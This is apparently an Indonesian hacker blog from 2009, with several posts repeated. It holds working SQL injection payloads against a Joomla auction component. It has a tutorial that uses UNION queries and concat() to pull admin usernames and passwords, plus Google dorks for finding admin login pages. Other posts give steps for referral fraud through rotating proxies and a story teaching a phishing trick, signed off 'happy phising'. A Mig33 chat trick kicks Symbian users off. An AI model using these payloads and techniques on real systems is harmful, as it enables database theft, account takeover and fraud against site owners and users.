Suatu hari, mau buka mig33, eh, takut pulsa membengkak, yaudah, buka google, searchbokep hacking, nah, keluar tuh "mig33 tricks" ternyata pada ngakalin bot/engine-nya mig33 (dapet emoticons lah, dll.) nah, trus saya search yang lebih bermutu lagi yaitu: "friendster hacking" HAHAHAHAHA!!! Lalu, saya sangaaat tertarik untuk hacking, jadi di warnet apa lagi kalo bukan cari-cari tutorial, refrensi, dll. (Udah masuk dunia per-hackingan) Tapi pas itu tujuannya lain... Yaitu iseng, dll.
Keadaan saat itu: Saya pindah rumah
Lalu aku beli buku "Tekhnik Hacking and Overlay Friendster" untuk belajar Hacking Friendster, dan ternyata, "ADMINNYA FRIENDSTER SUDAH NGEPATCH SECURITY-NYA!!! CODE-CODE DI BUKU ITU TIDAK BERGUNA! TIDAK BERGUNA!!!" Tapi ternyata berguna juga...
Saya bisa belajar HTML dasar, JavaScript Dasar, XSS, CSRF, dll.
Hahahaha... Saya-pun mendalami ilmu perhackingan karena dirumahku sudah ada akses Internet (indomie telor kornet HURRAY!!!)
Hyahahahahahaha... pas itu masih "Black" suka pake soceng malah dapet korban phising orang laen, dibuka atu-atu tapi gak saya apa-apain (buat ape juga??? gak berguna sama sekali!!)
Trus pekerjaan yang paling gak berguna adalah: Pake Opera, edit source code page, and save... Jadinya saya cuman edit-edit Gak Jelas doank, gak maksud, perubahannya cuma di kompi saya doank...
Nah, masa-masa kelabu pun selesai...
Udah masuk ke Hacker Center (tapi gak pernah regist), Echo, Yogyafree, Jasakom, Indonesian Coder, dll (dan gak pernah regist semua...) kecuali Fasthacker (saya udah regist, cari aja namanya X_Oblivion) membuat mata saya terbuka tentang Hacking...
Ternyata Hacking itu baik tidak ada yang jahat, tapi kalo menurut hukum TETEP jahat (iyalah, soalnya kan ILLEGAL OPERATIONS)
Yep, semuannya berlalu sampe sekarang...................
OK, itulah cerita panjang dari seorang ne0 d4rk fl00d3r
---END---
Ahaha... ngepost beginian, kayak gak ada kerjaan aja...
Tapi emang gw tukang nulis sih... (Copas lebih sering untuk tutor... ^_^)
ok,yang ingin mengenalku lebih jauh, tunggu bentar...
bentar....
bentar.....
bentar.....
bentar lagi....
sedikit lagi......
Hahahahahaha!!!
Nih, saya bercerita tentang diriku...
Jadi, saya dulu (kira-kira kelas 3 SD) mengenal yang Namanya "Hacking" tapi dulu gambaran saya pada waktu itu tentang hacking adalah "Takeover", "Main Bobol", "Nyuri Passowrd", dll. Tapi saya pada saat itu gak hack-hackan karena gak ada internet... ^_^ baru tuh, pas kelas 6, saya maen mig33 dan banyak temen-temen sepermainan dota, sampe om-om pun maen...
Suatu hari, mau buka mig33, eh, takut pulsa membengkak, yaudah, buka google, search
Keadaan saat itu: Saya pindah rumah
Lalu aku beli buku "Tekhnik Hacking and Overlay Friendster" untuk belajar Hacking Friendster, dan ternyata, "ADMINNYA FRIENDSTER SUDAH NGEPATCH SECURITY-NYA!!! CODE-CODE DI BUKU ITU TIDAK BERGUNA! TIDAK BERGUNA!!!" Tapi ternyata berguna juga...
Saya bisa belajar HTML dasar, JavaScript Dasar, XSS, CSRF, dll.
Hahahaha... Saya-pun mendalami ilmu perhackingan karena dirumahku sudah ada akses Internet (
Hyahahahahahaha... pas itu masih "Black" suka pake soceng malah dapet korban phising orang laen, dibuka atu-atu tapi gak saya apa-apain (buat ape juga??? gak berguna sama sekali!!)
Trus pekerjaan yang paling gak berguna adalah: Pake Opera, edit source code page, and save... Jadinya saya cuman edit-edit Gak Jelas doank, gak maksud, perubahannya cuma di kompi saya doank...
Nah, masa-masa kelabu pun selesai...
Udah masuk ke Hacker Center (tapi gak pernah regist), Echo, Yogyafree, Jasakom, Indonesian Coder, dll (dan gak pernah regist semua...) kecuali Fasthacker (saya udah regist, cari aja namanya X_Oblivion) membuat mata saya terbuka tentang Hacking...
Ternyata Hacking itu baik tidak ada yang jahat, tapi kalo menurut hukum TETEP jahat (iyalah, soalnya kan ILLEGAL OPERATIONS)
Yep, semuannya berlalu sampe sekarang...................
OK, itulah cerita panjang dari seorang ne0 d4rk fl00d3r
---END---
Cara Seorang Hacker: Mencari Admin Login tanpa mantra... (Iye, tapi pake google...)
Wah... Postingan baru nih...
Biasanya kita abis SQLi langsyung ke admin login ato udah login, tapi kalo belom login ke admin, gak tau dimana admin loginnya...
TENANGLAH!!!
Kita bisa mendapatkannya hanya lewat Web Browser dan Google!!!
Caranya begini:
- Buka google (tapi jangan buka celana... hehehe...)
- Search dengan dork (Dork tau gak? Dork itu Keyword):
site:webtarget.com inurl:admin
site:webtarget.com intitle:Admin Login
site:webtarget.com intext:Admin Login
dll.
Udah dapet kalo pake dork diatas? berarti anda sudah menemukan admin login tersebut!!!
OK, kalo belum, coba kamu buat sendiri dorknya... (hehehe)
---END OF CONTENT---
Biasanya kita abis SQLi langsyung ke admin login ato udah login, tapi kalo belom login ke admin, gak tau dimana admin loginnya...
TENANGLAH!!!
Kita bisa mendapatkannya hanya lewat Web Browser dan Google!!!
Caranya begini:
- Buka google (tapi jangan buka celana... hehehe...)
- Search dengan dork (Dork tau gak? Dork itu Keyword):
site:webtarget.com inurl:admin
site:webtarget.com intitle:Admin Login
site:webtarget.com intext:Admin Login
dll.
Udah dapet kalo pake dork diatas? berarti anda sudah menemukan admin login tersebut!!!
OK, kalo belum, coba kamu buat sendiri dorknya... (hehehe)
---END OF CONTENT---
Rabu, 09 September 2009
Penyempurnaan Restart Code pada Symbian (untuk kebaikan)
Ada yang tau Mig33? Mig33 dipopulerkan oleh IM3 (itu lhoo yang chatting itu...)
Nah, saya akan mengajarkan anda tentang cara restart code pada Symbian yang kemarin yaitu [TAB]
OK, kita hanya perlu web browser dan notepad...
Regist aja dulu kalo gak punya Mig33, kalo udah punya mig33 login dikomputer yee....
OK, saya akan membuat Dongeng lagi:
Disebuah Room di Mig33 yang bernama "Seks Bebas" (soalnya itu tuh room yang paling rame) Bilanglah si pelaku bernama ne0
Seks Bebas: ne0 is entered
Seks Bebas: Currently in room: ne0, --aaaaa--, wkwkwk, leo_macan, beauty_girlz, meta, devilzman, ml yuks, ajigile
--aaaaa--: Wew...
wkwkwk: Napa sih ni org?
leo_macan: biasa...
ne0: halo....
meta: aaaaa lagi stres
--aaaaa--: gw punya hape nokia baru
meta: symbian?
--aaaaa--: iye...
ne0: gw ol di-kompi
meta: swt
devilzman: ml-an yuk
ajigile: hape gw juga nokia
devilzman: gw juga symbian, tapi BTW, ML-AN YUKS!
ml yuks: wot?
meta: dodol
ne0: koq ngmng gk nyambung???
Seks Bebas: yo_attack has entered
ml yuks: gw blg "APA?"
meta: lw dodol!
leo_macan: si meta bukannya juga symbian juga?
---Ini bukan dalam chat:---
Wah, banyak orang tercela nih disini, kalo mereka udah ngacauin room tinggal gw TAB!
---Back to chat---
yo_attack: meta jelek!
meta: hp gw bukan symbian dodol!
yo_attack: hp gw yg symbian...
leo_macan: ajigile! lw ngapaen?
wkwkwk: dia lagi ml
ajigile: wena'e! gw lgi kesepian...
yo_attack: o yeah?
--aaaaa--: sori, sapa yg cari gw? tdi gw bru k wc...
--aaaaa--: leo, lw manggil gw?
leo_macan: GE-ER!
---
Mulai rusuh...
---
yo_attack: ajigile udah gile beneran yaa?
ajigile: ANJRID U!!!
leo_macan: H
leo_macan: A
leo_macan: H
leo_macan: A
Seks Bebas: ajigile start to kick leo_macan, 3 wotes required
yo_attack: lw mau dikick leo!
ne0: wele"
leo_macan: AAAAA!!!
ne0: udah gila yaa semuanya????
Seks Bebas: vote for kick leo_macan is failed
ajigile: ini giliran loe ne0!!!
---
Gw dah mau dikick! gw langsung buka notepad, tulis "Sudahlah![tab][tab]" lalu copy siap-siap paste ke mig33
---
Seks Bebas: ajigile start to kick ne0, 3 vote required
ne0: Sudahlah!
Seks Bebas: ajigile has left
Seks Bebas: ml_yuks has left
Seks Bebas: meta has left
Seks Bebas: --aaaaa-- has left
Seks Bebas: yo_attack has left
Seks Bebas: devilzman has left
Seks Bebas: wkwkwk has left
Seks Bebas: beauty_girlz has left
Seks Bebas: leo_macan has left
---
BUSEET! ternyata mereka semua pake symbian??? dasar fitnah!
---
Itulah cara hacking yang baik dan benar, udah tau kan konsepnya???
OK, Gutbai!!!
Nah, saya akan mengajarkan anda tentang cara restart code pada Symbian yang kemarin yaitu [TAB]
OK, kita hanya perlu web browser dan notepad...
Regist aja dulu kalo gak punya Mig33, kalo udah punya mig33 login dikomputer yee....
OK, saya akan membuat Dongeng lagi:
Disebuah Room di Mig33 yang bernama "Seks Bebas" (soalnya itu tuh room yang paling rame) Bilanglah si pelaku bernama ne0
Seks Bebas: ne0 is entered
Seks Bebas: Currently in room: ne0, --aaaaa--, wkwkwk, leo_macan, beauty_girlz, meta, devilzman, ml yuks, ajigile
--aaaaa--: Wew...
wkwkwk: Napa sih ni org?
leo_macan: biasa...
ne0: halo....
meta: aaaaa lagi stres
--aaaaa--: gw punya hape nokia baru
meta: symbian?
--aaaaa--: iye...
ne0: gw ol di-kompi
meta: swt
devilzman: ml-an yuk
ajigile: hape gw juga nokia
devilzman: gw juga symbian, tapi BTW, ML-AN YUKS!
ml yuks: wot?
meta: dodol
ne0: koq ngmng gk nyambung???
Seks Bebas: yo_attack has entered
ml yuks: gw blg "APA?"
meta: lw dodol!
leo_macan: si meta bukannya juga symbian juga?
---Ini bukan dalam chat:---
Wah, banyak orang tercela nih disini, kalo mereka udah ngacauin room tinggal gw TAB!
---Back to chat---
yo_attack: meta jelek!
meta: hp gw bukan symbian dodol!
yo_attack: hp gw yg symbian...
leo_macan: ajigile! lw ngapaen?
wkwkwk: dia lagi ml
ajigile: wena'e! gw lgi kesepian...
yo_attack: o yeah?
--aaaaa--: sori, sapa yg cari gw? tdi gw bru k wc...
--aaaaa--: leo, lw manggil gw?
leo_macan: GE-ER!
---
Mulai rusuh...
---
yo_attack: ajigile udah gile beneran yaa?
ajigile: ANJRID U!!!
leo_macan: H
leo_macan: A
leo_macan: H
leo_macan: A
Seks Bebas: ajigile start to kick leo_macan, 3 wotes required
yo_attack: lw mau dikick leo!
ne0: wele"
leo_macan: AAAAA!!!
ne0: udah gila yaa semuanya????
Seks Bebas: vote for kick leo_macan is failed
ajigile: ini giliran loe ne0!!!
---
Gw dah mau dikick! gw langsung buka notepad, tulis "Sudahlah![tab][tab]" lalu copy siap-siap paste ke mig33
---
Seks Bebas: ajigile start to kick ne0, 3 vote required
ne0: Sudahlah!
Seks Bebas: ajigile has left
Seks Bebas: ml_yuks has left
Seks Bebas: meta has left
Seks Bebas: --aaaaa-- has left
Seks Bebas: yo_attack has left
Seks Bebas: devilzman has left
Seks Bebas: wkwkwk has left
Seks Bebas: beauty_girlz has left
Seks Bebas: leo_macan has left
---
BUSEET! ternyata mereka semua pake symbian??? dasar fitnah!
---
Itulah cara hacking yang baik dan benar, udah tau kan konsepnya???
OK, Gutbai!!!
Selasa, 08 September 2009
Bug Joomla Component
Bug ditemukan oleh 599eme Man pada Jomla Component:
- SQLi:
http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=-2%20union%20all%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22,23,24,25,26,27,28,29
- Blind SQLi:
http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2%20and%201=2 => False
http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2%20and%201=1 => True
http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2 and substring(@@version,1,1)=4 => False
http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2 and substring(@@version,1,1)=5 => True
---3|\||)---
- SQLi:
http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=-2%20union%20all%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22,23,24,25,26,27,28,29
- Blind SQLi:
http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2%20and%201=2 => False
http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2%20and%201=1 => True
http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2 and substring(@@version,1,1)=4 => False
http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2 and substring(@@version,1,1)=5 => True
---3|\||)---
Senin, 07 September 2009
Chat Facebook tanpa buka situs Facebooknya
OK, saya lagi jalan-jalan ke Palembang Hacker Link nih, ketemu sama trik ini (ini sih bukan hacking, tapi Social Networking...) Yaa, itung-itung buat jatah nasi (lhoo? koq gak nyambung...) itung-itung kita bisa pake untuk kemudian hari... (kalo speed lagi lemotz...)
OK, inilah toolnya: DOWNLOAD DISINI!!!
Nah, tool ini (kayaknya lebih bisa dibilang "software") client untuk FB, kegunaanya adalah untuk chatting, memperbaharui status, dll. (coba sendiri!)
OK, EoP!!!
OK, inilah toolnya: DOWNLOAD DISINI!!!
Nah, tool ini (kayaknya lebih bisa dibilang "software") client untuk FB, kegunaanya adalah untuk chatting, memperbaharui status, dll. (coba sendiri!)
OK, EoP!!!
I'm Surrender!!! SQLi Tutorial banyak banget menurut mpu Marezzi!!! (AKU MENYERAAAHHH!!!)
Kalo translate artikel dari milw0rm, trus panjang lagi itu saaaaaaaaaangaaaat susah dan saaaaaaaangaaaaaaat lama... Emank banyak sih artikel tentang SQLi...
OK deh, silahkan baca sendiri di SINI
AKU BERJANJI AKAN MEMBUAT ARTIKEL SQL INJECTION YANG LEBIH GAMPANG!
Peace...
ne0 d4rk fl00d3r
OK deh, silahkan baca sendiri di SINI
AKU BERJANJI AKAN MEMBUAT ARTIKEL SQL INJECTION YANG LEBIH GAMPANG!
Peace...
ne0 d4rk fl00d3r
Sabtu, 05 September 2009
Bagi orang yang gak bangga sama Hacker yang ngehack situs-situs pas HUT RI, baca ini!
Liat dari Kaskus
Saya sebenernya setuju-setuju aja ngedeface situs Maling pada saat itu, tetapi kalo situs negara sendiri, mungkin ada yang berpikiran begini:
"Mencerdaskan Kehidupan bangsa di Dunia Maya untuk menyadarkan mereka tentang bugs tersebut"
Saya sih setuju kalo begitu!
Kalo begini:
"Iseng"
-__- Saya gak setuju banget! Sebagai White Hat, saya gak terima! (Halah, apa sih?)
Jadi, bagi orang awam yang gak tau apa-apa, cobalah untuk tidak berprasangka buruk dulu, siapa tau mereka beralasan seperti alasan pertama...
r36r4|)5.
ne0 d4rk fl00d3r
Saya sebenernya setuju-setuju aja ngedeface situs Maling pada saat itu, tetapi kalo situs negara sendiri, mungkin ada yang berpikiran begini:
"Mencerdaskan Kehidupan bangsa di Dunia Maya untuk menyadarkan mereka tentang bugs tersebut"
Saya sih setuju kalo begitu!
Kalo begini:
"Iseng"
-__- Saya gak setuju banget! Sebagai White Hat, saya gak terima! (Halah, apa sih?)
Jadi, bagi orang awam yang gak tau apa-apa, cobalah untuk tidak berprasangka buruk dulu, siapa tau mereka beralasan seperti alasan pertama...
r36r4|)5.
ne0 d4rk fl00d3r
Stupid Phising Revolution
Ini adalah lanjutan dari Stupid Phising yang diceritakan bahwa Adi di-phish oleh Joe Cracker dan Facebook-nya di-deactive.
OK, inilah kelanjutannya:
Cerita ini hanyalah Fiksi belaka, jika ada kesamaan tokoh, mohon orang itu diceburkan kedalam kolam yang penuh dengan buaya lapar dan tidak cacat dan Karnivora! dan Rumahnya juga harus dijadikan sebagai penyembahan berhala, Kenapa? karena dicerita ini tidak ada Buaya Karnivora dan penyembahan berhala.
Stupid Phising
Suatu Hari, Adi, seorang yang sudah di-"alert" oleh Joe Cracker pergi ke rumah pamannya yang seorang Hacker, Adi sudah tau kalau pamannya tidak akan crack dia, 1000000000%
Disana, dia juga mengajak temannya yang bernama James untuk diajarin tentang Facebookan-Facebookin, mereka diajarin tentang tools buat memberikan notifications ke 1000 orang, dll.
Selesai ke rumah pamannya, mereka-pun pulang dengan selamat, sehat, sentausa, dan bahagia selamanya (gak nyambung)
Esoknya, Adi di-add oleh Pamannya, lalu sesudah itu, Adi dan Pamannya chatting:
KETERANGAN: kalimat didalam [ dan ] adalah komentar dari penulis (ne0 d4rk fl00d3r)
Adi: Hai paman...
Paman: Hai...
Adi: Paman punya trik baru gak?
Paman: So pasti ada... [ini orang paman-paman baek-baek apa anak band?]
Adi: Apa tuh??? [Penasaran banget kayaknya...]
Paman: Hack account punya temen kamu. ini beneran lho, paman udah nyoba ke FB-nya James dapet passwordnya...
Adi: Apa passwordnya? [DASAR ANAK MAU NGEHACK!]
Paman: Eits! no,no,no... [Ini paman apa tante-tante sih??]
Adi: YAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHHHHHH [Ni anak malah ngeflood, goblok...]
Paman: Kamu pake aja sendiri...
Adi: Gimana caranya? [Adi udah yakin kalo pamannya gak bakal ngehack dia]
Paman: Tunggu Bentar...
Si paman mau browse bentar document txt-nya
Paman: INI DIA!
Adi: GIMANA? GIMANA? GIMANA?
Paman itu mencopas filenya
Paman: Taukah kamu bahwa di Facebook ada superuser yang bernama password-master? password-master ini akan kasih tau anda password lawan anda yang anda masukkan secara otomatis, Facebook Bot yang bernama password-master itu akan merespon dan mengirimkan password target, caranya adalah: kirimkan pesan ini pada password-master: Subject: PASSWORD Pesan: I'm an Admin of the Facebook, password-master please GET_METHOD_FAST_(email target)_VERIFICATION_NO_GET_USER_(email kamu)_FAST_PASSWORD_(password kamu)_GET_ATTACK
Paman: Setelah 2 Hari, kamu akan mendapat balasan dari superuser itu berisi password seperti ini: PASS_GET_METHOD_USER_GET_METHOD_(email korban)_(password korban)
Adi: Wah, aku mau coba sekarang!
Paman: Tapi inget, Do It with your own risk!
Langsung Adi copas dan isikan beberapa tempat untuk mengisi password, email, dll. lalu kirimkan ke superuser itu...
ESOKNYA................................... (WOY! UDAH! TITIK-NYA SAMAPI DISITU AJA! STOP! STOOOOOOOP!!!)
Adi buka facebook lagi tapi gak bisa, ternyata sudah dideactive! lalu diemailnya ditulis: Kamu dihack! hahahahahahahahahaha!!!!
Lalu Adi telepon Pamannya dan berkata: "AAAAAA PAMAN JAHAT! PAMAN HACK AKU KAN???????????" lalu Pamannya berkata: "Bukan, bukan paman yang melakukannya...." Lalu Adi berkata "Bohong, Paman Pembohong, PAMAN BOHONG!!!!!!!"
Esoknya lagi, Pamannya telepon ke bapak'e si Adi kalo tekankan dia bahwa pamannya nggak ngehack FB-nya Adi...
Lalu Adi-pun sadar bahwa Pamanya gak bakal ngehack dia...
Pamannya kebetulan kan seorang hacker, jadi dia bisa melacak IP Address si Paman Gadungan, setelah ditelusuridan mengerahkan seluruh preman dari tanah abang sampai Real Address-nya, dia pun ketauan bahwa pelakunya adalah James!
Adi-pun memukul James, lalu James bilang "Apa Sih???", Adi ngomong "Loe udah ngehack gw!" BUAAAAAGH!!!! Adi-pun memukul lagi, Paman dan Ayahnya si Adi malah liatin sambil kayak main PS (Tangannya lagi kayak megang stik PS dan kayak mencet-mencet tombol PS) Memang Ayah dan Paman yang tidak sayang anak...
Teruskan bertarungnya: Adi memukul dan mendamage 300 ke James, lalu James menendang Adi dan mendamage Adi 280, lalu Adi menyundul James tetapi miss! karena James menghindar, lalu terjatuh dan James terdamage 5, karena James kestun, Adi-pun bisa melancarkan jurus terakhir, kerahkan preman-preman tanah abang! lalu semuanya mendamage James 999999999 Damage! dan...
Adi Just pwned James head! 000 Gold split!
Adi just drew Pers Blat!
James is left the game!
---GAME OVER!!!---
James pun menyerah...
Dia kasih account FB-nya Adi lagi...
Dan Adi-pun pulang dengan perasaan senang dan bahagia selamanya (perasaan ini bukan dongeng anak kecil deh...)
----------------END OF CERITA------------------------
Nah, udah tau kan konsep phising-nya?
OK, End of Postingan
Nah, happy phising!
OK, inilah kelanjutannya:
Cerita ini hanyalah Fiksi belaka, jika ada kesamaan tokoh, mohon orang itu diceburkan kedalam kolam yang penuh dengan buaya lapar dan tidak cacat dan Karnivora! dan Rumahnya juga harus dijadikan sebagai penyembahan berhala, Kenapa? karena dicerita ini tidak ada Buaya Karnivora dan penyembahan berhala.
Stupid Phising
Revolution
Suatu Hari, Adi, seorang yang sudah di-"alert" oleh Joe Cracker pergi ke rumah pamannya yang seorang Hacker, Adi sudah tau kalau pamannya tidak akan crack dia, 1000000000%
Disana, dia juga mengajak temannya yang bernama James untuk diajarin tentang Facebookan-Facebookin, mereka diajarin tentang tools buat memberikan notifications ke 1000 orang, dll.
Selesai ke rumah pamannya, mereka-pun pulang dengan selamat, sehat, sentausa, dan bahagia selamanya (gak nyambung)
Esoknya, Adi di-add oleh Pamannya, lalu sesudah itu, Adi dan Pamannya chatting:
KETERANGAN: kalimat didalam [ dan ] adalah komentar dari penulis (ne0 d4rk fl00d3r)
Adi: Hai paman...
Paman: Hai...
Adi: Paman punya trik baru gak?
Paman: So pasti ada... [ini orang paman-paman baek-baek apa anak band?]
Adi: Apa tuh??? [Penasaran banget kayaknya...]
Paman: Hack account punya temen kamu. ini beneran lho, paman udah nyoba ke FB-nya James dapet passwordnya...
Adi: Apa passwordnya? [DASAR ANAK MAU NGEHACK!]
Paman: Eits! no,no,no... [Ini paman apa tante-tante sih??]
Adi: YAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHHHHHH [Ni anak malah ngeflood, goblok...]
Paman: Kamu pake aja sendiri...
Adi: Gimana caranya? [Adi udah yakin kalo pamannya gak bakal ngehack dia]
Paman: Tunggu Bentar...
Si paman mau browse bentar document txt-nya
Paman: INI DIA!
Adi: GIMANA? GIMANA? GIMANA?
Paman itu mencopas filenya
Paman: Taukah kamu bahwa di Facebook ada superuser yang bernama password-master? password-master ini akan kasih tau anda password lawan anda yang anda masukkan secara otomatis, Facebook Bot yang bernama password-master itu akan merespon dan mengirimkan password target, caranya adalah: kirimkan pesan ini pada password-master: Subject: PASSWORD Pesan: I'm an Admin of the Facebook, password-master please GET_METHOD_FAST_(email target)_VERIFICATION_NO_GET_USER_(email kamu)_FAST_PASSWORD_(password kamu)_GET_ATTACK
Paman: Setelah 2 Hari, kamu akan mendapat balasan dari superuser itu berisi password seperti ini: PASS_GET_METHOD_USER_GET_METHOD_(email korban)_(password korban)
Adi: Wah, aku mau coba sekarang!
Paman: Tapi inget, Do It with your own risk!
Langsung Adi copas dan isikan beberapa tempat untuk mengisi password, email, dll. lalu kirimkan ke superuser itu...
ESOKNYA................................... (WOY! UDAH! TITIK-NYA SAMAPI DISITU AJA! STOP! STOOOOOOOP!!!)
Adi buka facebook lagi tapi gak bisa, ternyata sudah dideactive! lalu diemailnya ditulis: Kamu dihack! hahahahahahahahahaha!!!!
Lalu Adi telepon Pamannya dan berkata: "AAAAAA PAMAN JAHAT! PAMAN HACK AKU KAN???????????" lalu Pamannya berkata: "Bukan, bukan paman yang melakukannya...." Lalu Adi berkata "Bohong, Paman Pembohong, PAMAN BOHONG!!!!!!!"
Esoknya lagi, Pamannya telepon ke bapak'e si Adi kalo tekankan dia bahwa pamannya nggak ngehack FB-nya Adi...
Lalu Adi-pun sadar bahwa Pamanya gak bakal ngehack dia...
Pamannya kebetulan kan seorang hacker, jadi dia bisa melacak IP Address si Paman Gadungan, setelah ditelusuri
Adi-pun memukul James, lalu James bilang "Apa Sih???", Adi ngomong "Loe udah ngehack gw!" BUAAAAAGH!!!! Adi-pun memukul lagi, Paman dan Ayahnya si Adi malah liatin sambil kayak main PS (Tangannya lagi kayak megang stik PS dan kayak mencet-mencet tombol PS) Memang Ayah dan Paman yang tidak sayang anak...
Teruskan bertarungnya: Adi memukul dan mendamage 300 ke James, lalu James menendang Adi dan mendamage Adi 280, lalu Adi menyundul James tetapi miss! karena James menghindar, lalu terjatuh dan James terdamage 5, karena James kestun, Adi-pun bisa melancarkan jurus terakhir, kerahkan preman-preman tanah abang! lalu semuanya mendamage James 999999999 Damage! dan...
Adi Just pwned James head! 000 Gold split!
Adi just drew Pers Blat!
James is left the game!
---GAME OVER!!!---
James pun menyerah...
Dia kasih account FB-nya Adi lagi...
Dan Adi-pun pulang dengan perasaan senang dan bahagia selamanya (perasaan ini bukan dongeng anak kecil deh...)
----------------END OF CERITA------------------------
Nah, udah tau kan konsep phising-nya?
OK, End of Postingan
Nah, happy phising!
Free Domain Box Hacking!
Maaf bagi orang-orang yang menantikan SQLi 3, tetapi kita selingi yang ringan-ringan dulu yaa...
OK, saya sebenernya ingin sekali mendapatkan free domain dot com, tapi bayar semua, (males banget...) Ini demi kalina semua lhoo, supaya gak perlu .co.cc tapi udah .com (biar nanti orang-orang gak kayak gini:
Temen: Kamu buka apaan jadi pinter hacking?
Anda: Darkness Hacker
Temen: Address-nya apa?
Anda: www.darknezzhacker.co.cc
Temen: Masih .co.cc? ahh, gak jaman, pasti adminnya kere...
DDUUUUAAAAAAAAAARRRRR!!!!)
Ahaahahahahaha! Kita coba Free Domain Box (yang katanya systemnya gak bisa dibo'ongin) Yaitu saya beri nama "Hacking under Proxies" (YAIYALAH!)
Jadi begini Efeknya:
Kamu bisa merefer diri kamu sendiri berkali-kali sehingga kamu bisa dapet points
Konsep:
Merefer diri sendiri berulang-ulang kali
Sebenernya gak bisa dapet point... -__- Tapi kan bisa jadi bahan pelajaran bagi kalian semua.
LET'Z GO!!!
Persiapan:
- Beberapa Proxies
- Foxy Proxy biar lebih gampang (Mozilla Serigala Api ONLY!)
- Punya account untuk direfer
- Web Browser
- Notepad
- Jiwa
- Proxies (Perasaan udah 2 kali "Proxies" ditulis...)
Tutorial:
1. Masuk ke Free Domains Box, lalu login, lalu klik Refer other people
2. Copas Refer link yang ada signup-nya (yg bawah) ke Notepad
3. Logout, lalu pasang proxy
4. Buka Tab baru link yang tadi kamu copas tadi kamu copas lagi ke web browser kamu (di tab barunya yaa...)
5. Sign Up sesuai dengan Proxy, (misalnya kamu punya proxy Italy, kamu isi kota dan negara di Italy karena ternyata Free Domain Box sedikit pinter untuk scan IP kita dan Lokasi IP kita sesuai IP kita)
6. Selesaikan proses Sign Up anda (Email Verification, dll.)
7. Logout
8. Ganti Proxy
9. Kembali ke nomor 4 Sampai puas
Nah, udah tau kan sekarang, dan Free Domains Box itu agak sombong, coba liat screenshot INI
Karena saya udah coba Hack dan berhasil...
OK, Happy Hacking ^_^
OK, saya sebenernya ingin sekali mendapatkan free domain dot com, tapi bayar semua, (males banget...) Ini demi kalina semua lhoo, supaya gak perlu .co.cc tapi udah .com (biar nanti orang-orang gak kayak gini:
Temen: Kamu buka apaan jadi pinter hacking?
Anda: Darkness Hacker
Temen: Address-nya apa?
Anda: www.darknezzhacker.co.cc
Temen: Masih .co.cc? ahh, gak jaman, pasti adminnya kere...
DDUUUUAAAAAAAAAARRRRR!!!!)
Ahaahahahahaha! Kita coba Free Domain Box (yang katanya systemnya gak bisa dibo'ongin) Yaitu saya beri nama "Hacking under Proxies" (YAIYALAH!)
Jadi begini Efeknya:
Kamu bisa merefer diri kamu sendiri berkali-kali sehingga kamu bisa dapet points
Konsep:
Merefer diri sendiri berulang-ulang kali
Sebenernya gak bisa dapet point... -__- Tapi kan bisa jadi bahan pelajaran bagi kalian semua.
LET'Z GO!!!
Persiapan:
- Beberapa Proxies
- Foxy Proxy biar lebih gampang (Mozilla Serigala Api ONLY!)
- Punya account untuk direfer
- Web Browser
- Notepad
- Jiwa
- Proxies (Perasaan udah 2 kali "Proxies" ditulis...)
Tutorial:
1. Masuk ke Free Domains Box, lalu login, lalu klik Refer other people
2. Copas Refer link yang ada signup-nya (yg bawah) ke Notepad
3. Logout, lalu pasang proxy
4. Buka Tab baru link yang tadi kamu copas tadi kamu copas lagi ke web browser kamu (di tab barunya yaa...)
5. Sign Up sesuai dengan Proxy, (misalnya kamu punya proxy Italy, kamu isi kota dan negara di Italy karena ternyata Free Domain Box sedikit pinter untuk scan IP kita dan Lokasi IP kita sesuai IP kita)
6. Selesaikan proses Sign Up anda (Email Verification, dll.)
7. Logout
8. Ganti Proxy
9. Kembali ke nomor 4 Sampai puas
Nah, udah tau kan sekarang, dan Free Domains Box itu agak sombong, coba liat screenshot INI
Karena saya udah coba Hack dan berhasil...
OK, Happy Hacking ^_^
SQL Injection Reloaded 2
Inilah lanjutan dari SQL Injection yang lalu (maaf yaa kalo 2 postingan)
Lanjutan:
5. Mendapatkan nama table dan column
Jika versi MySQL-nya < 5 (i.e 4.1.33, 4.1.12...) kita harus menebaknya... Biasanya table bernama: user/s, admin/s, member/s Dan biasanya nama column-nya: username, user, usr, user_name, password, pass, passwd, pwd etc...
Contoh cek-nya: www.korbansqli.com/news.php?id=5 union all select 1,2,3 from admin/*
Coba kita main tebak-tebakan: www.site.com/news.php?id=5 union all select 1,username,3 from admin/* Kita masukin ke nomor 2 karena Angka yang ada tadi 2, jadi kita ganti 2 menjadi nama column Kalo salah, akan muncul error, dan jika benar, akan muncul di layar usernamenya seperti admin atau superadmin
Kita akan cari passwordnya www.site.com/news.php?id=5 union all select 1,password,3 from admin/* Jika error, gantilah nama yang lain selain password, jika benar, kita akan melihat password yang masih hash atau sudah plain text (sesuai databasenya)
Lalu, kita harus menyelesaikan Query ini (kata mpu Marezzi biar bagus :-) ) Pakailah Concat = concat()
Contoh: www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note: Mpu Marezzi berkata, dia masukin 0x3a itu adalah hex value (jadi 0x3a adalah value dari column)
To be Continued Again (BANYAK BANGET!!!)
Lanjutan:
5. Mendapatkan nama table dan column
Jika versi MySQL-nya < 5 (i.e 4.1.33, 4.1.12...) kita harus menebaknya... Biasanya table bernama: user/s, admin/s, member/s Dan biasanya nama column-nya: username, user, usr, user_name, password, pass, passwd, pwd etc...
Contoh cek-nya: www.korbansqli.com/news.php?id=5 union all select 1,2,3 from admin/*
